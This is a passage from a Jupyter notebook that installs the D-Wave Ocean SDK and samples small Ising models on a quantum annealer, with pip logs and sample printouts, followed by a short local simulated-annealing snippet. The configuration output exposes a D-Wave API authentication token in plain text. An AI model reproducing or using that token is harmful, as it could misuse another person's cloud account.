37.6MB/s \n\u001b[?25hRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (0.10.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (2.4.0)\nRequirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (1.1.0)\nRequirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib==3.0.0->wildqat) (2.5.3)\nRequirement already satisfied: decorator>=4.3.0 in /usr/local/lib/python3.6/dist-packages (from networkx==2.2->wildqat) (4.4.0)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from cycler>=0.10->matplotlib==3.0.0->wildqat) (1.12.0)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from kiwisolver>=1.0.1->matplotlib==3.0.0->wildqat) (41.0.1)\nBuilding wheels for collected packages: wildqat, networkx\n Building wheel for wildqat (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/bc/b5/17/e68df34616a7719b1aa093d9aacdf006fe5a1640811e0ae942\n Building wheel for networkx (setup.py) ... \u001b[?25l\u001b[?25hdone\n Stored in directory: /root/.cache/pip/wheels/68/f8/29/b53346a112a07d30a5a84d53f19aeadaa1a474897c0423af91\nSuccessfully built wildqat networkx\n\u001b[31mERROR: yellowbrick 0.9.1 has requirement matplotlib!=3.0.0,>=1.5.1, but you'll have matplotlib 3.0.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: scikit-image 0.15.0 has requirement matplotlib!=3.0.0,>=2.0.0, but you'll have matplotlib 3.0.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: datascience 0.10.6 has requirement folium==0.2.1, but you'll have folium 0.8.3 which is incompatible.\u001b[0m\nInstalling collected packages: numpy, matplotlib, networkx, wildqat\n Found existing installation: numpy 1.16.4\n Uninstalling numpy-1.16.4:\n Successfully uninstalled numpy-1.16.4\n Found existing installation: matplotlib 3.0.3\n Uninstalling matplotlib-3.0.3:\n Successfully uninstalled matplotlib-3.0.3\n Found existing installation: networkx 2.3\n Uninstalling networkx-2.3:\n Successfully uninstalled networkx-2.3\nSuccessfully installed matplotlib-3.0.0 networkx-2.2 numpy-1.15.1 wildqat-1.1.9\n"
],
[
"import blueqat\nimport wildqat",
"_____no_output_____"
],
[
"!pip install dwave-ocean-sdk && dwave config create",
"Requirement already satisfied: dwave-ocean-sdk in /usr/local/lib/python3.6/dist-packages (1.4.0)\nRequirement already satisfied: dwave-hybrid<0.4.0,>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.3.1)\nRequirement already satisfied: pyqubo>=0.3.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.4.0)\nRequirement already satisfied: dwave-networkx<0.9.0,>=0.8.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.8.0)\nRequirement already satisfied: dwave-tabu<0.3.0,>=0.2.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.2.0)\nRequirement already satisfied: dwave-neal<0.6.0,>=0.5.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.5.1)\nRequirement already satisfied: dwave-system<0.8.0,>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.7.5)\nRequirement already satisfied: dimod<0.9.0,>=0.8.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.8.14)\nRequirement already satisfied: numpy<1.16.0 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (1.15.1)\nRequirement already satisfied: dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\" in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.0.11)\nRequirement already satisfied: dwave-qbsolv<0.3.0,>=0.2.7 in /usr/local/lib/python3.6/dist-packages (from dwave-ocean-sdk) (0.2.10)\nRequirement already satisfied: six>=1.10 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (1.12.0)\nRequirement already satisfied: minorminer>=0.1.7 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (0.1.8)\nRequirement already satisfied: networkx in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (2.2)\nRequirement already satisfied: click>5 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (7.0)\nRequirement already satisfied: plucky>=0.4.3 in /usr/local/lib/python3.6/dist-packages (from dwave-hybrid<0.4.0,>=0.3.0->dwave-ocean-sdk) (0.4.3)\nRequirement already satisfied: decorator<5.0.0,>=4.1.0 in /usr/local/lib/python3.6/dist-packages (from dwave-networkx<0.9.0,>=0.8.0->dwave-ocean-sdk) (4.4.0)\nRequirement already satisfied: dwave-cloud-client<0.6.0,>=0.5.0 in /usr/local/lib/python3.6/dist-packages (from dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (0.5.4)\nRequirement already satisfied: homebase<2.0.0,>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.0.1)\nRequirement already satisfied: jsonschema<3.0.0,>=2.6.0 in /usr/local/lib/python3.6/dist-packages (from dimod<0.9.0,>=0.8.0->dwave-ocean-sdk) (2.6.0)\nRequirement already satisfied: penaltymodel-cache<0.5.0,>=0.4.0 in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.4.0)\nRequirement already satisfied: penaltymodel<0.17.0,>=0.16.0 in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.16.2)\nRequirement already satisfied: penaltymodel-mip<0.3.0,>=0.2.0; extra == 
\"mip\" in /usr/local/lib/python3.6/dist-packages (from dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (0.2.1)\nRequirement already satisfied: requests[socks]>=2.18 in /usr/local/lib/python3.6/dist-packages (from dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.21.0)\nRequirement already satisfied: python-dateutil>=2.7 in /usr/local/lib/python3.6/dist-packages (from dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.8.0)\nRequirement already satisfied: ortools<7.0.0,>=6.6.4659 in /usr/local/lib/python3.6/dist-packages (from penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (6.10.6025)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (3.0.4)\nRequirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2.8)\nRequirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (2019.6.16)\nRequirement already satisfied: PySocks!=1.5.7,>=1.5.6; extra == \"socks\" in /usr/local/lib/python3.6/dist-packages (from requests[socks]>=2.18->dwave-cloud-client<0.6.0,>=0.5.0->dwave-system<0.8.0,>=0.7.0->dwave-ocean-sdk) (1.7.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from ortools<7.0.0,>=6.6.4659->penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (3.7.1)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from protobuf>=3.6.1->ortools<7.0.0,>=6.6.4659->penaltymodel-mip<0.3.0,>=0.2.0; extra == \"mip\"->dwavebinarycsp[mip]<0.1.0,>=0.0.9; (platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\") and python_version != \"3.4\"->dwave-ocean-sdk) (41.0.1)\nFound existing configuration file: /root/.config/dwave/dwave.conf\nConfiguration file path [/root/.config/dwave/dwave.conf]: \nProfile (create new or choose from: prod): prod\nAPI endpoint URL [https://cloud.dwavesys.com/leap/]: https://cloud.dwavesys.com/sapi\nAuthentication token [DEV-ddca80c30487ba608a2743b2105d60f8d6952fd0]: DEV-ddca80c30487ba608a2743b2105d60f8d6952fd0\nDefault client class (qpu or sw) [gpu]: qpu\nDefault solver [skip]: \nConfiguration saved.\n"
],
[
"from dwave.system.samplers import DWaveSampler",
"_____no_output_____"
],
[
"from dwave.system.composites import EmbeddingComposite",
"_____no_output_____"
],
[
"sampler = EmbeddingComposite(DWaveSampler())\n",
"_____no_output_____"
],
[
"response = sampler.sample_ising({0:0},{},num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 energy num_oc. chain_.\n0 -1 0.0 4 0.0\n1 +1 0.0 6 0.0\n['SPIN', 2 rows, 10 samples, 1 variables]\n"
],
[
"response = sampler.sample_ising({},{(0,1):1},num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 energy num_oc. chain_.\n0 -1 +1 -1.0 5 0.0\n1 +1 -1 -1.0 5 0.0\n['SPIN', 2 rows, 10 samples, 2 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):-1}, num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 energy num_oc. chain_.\n0 -1 -1 -1.0 7 0.0\n1 +1 +1 -1.0 3 0.0\n['SPIN', 2 rows, 10 samples, 2 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)",
"_____no_output_____"
],
[
"print(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 -1 +1 -1 +1 -1 -4.0 2 0.0\n1 +1 -1 +1 -1 -1 -4.0 2 0.0\n2 +1 -1 +1 -1 +1 -4.0 2 0.0\n3 -1 +1 -1 +1 +1 -4.0 3 0.0\n4 +1 -1 +1 -1 +1 -4.0 1 0.2\n['SPIN', 5 rows, 10 samples, 5 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)\nprint(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 -1 +1 -1 +1 -1 -4.0 2 0.0\n1 +1 -1 +1 -1 -1 -4.0 3 0.0\n2 +1 -1 +1 -1 +1 -4.0 1 0.0\n4 +1 -1 +1 -1 +1 -4.0 3 0.2\n3 -1 +1 +1 +1 -1 -2.0 1 0.2\n['SPIN', 5 rows, 10 samples, 5 variables]\n"
],
[
"response=sampler.sample_ising({},{(0,1):1, (1,2):1, (2,3):1, (3,0):1, (2,4):1, (3,4):1}, num_reads=10)\nprint(response)",
" 0 1 2 3 4 energy num_oc. chain_.\n0 +1 -1 +1 -1 +1 -4.0 1 0.2\n1 +1 -1 +1 -1 -1 -4.0 1 0.0\n2 +1 -1 +1 -1 +1 -4.0 1 0.0\n3 -1 +1 -1 +1 -1 -4.0 4 0.0\n5 -1 +1 -1 +1 +1 -4.0 2 0.0\n4 -1 +1 +1 +1 -1 -2.0 1 0.2\n['SPIN', 6 rows, 10 samples, 5 variables]\n"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
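The D-Wave hands-on above sends every sample_ising call to the QPU. As a purely illustrative aside — not part of the original session — the same antiferromagnetic problem can be checked locally with the simulated-annealing sampler that ships with the Ocean SDK installed earlier (dwave-neal appears in the pip output):

import neal

h = {}
J = {(0, 1): 1, (1, 2): 1, (2, 3): 1, (3, 0): 1, (2, 4): 1, (3, 4): 1}

# Classical simulated annealing; no QPU time or API token needed.
sa_sampler = neal.SimulatedAnnealingSampler()
sa_response = sa_sampler.sample_ising(h, J, num_reads=10)
print(sa_response)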